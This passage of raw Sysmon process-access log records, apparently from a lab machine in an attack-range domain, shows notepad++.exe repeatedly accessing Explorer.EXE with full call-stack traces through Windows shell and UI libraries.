17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 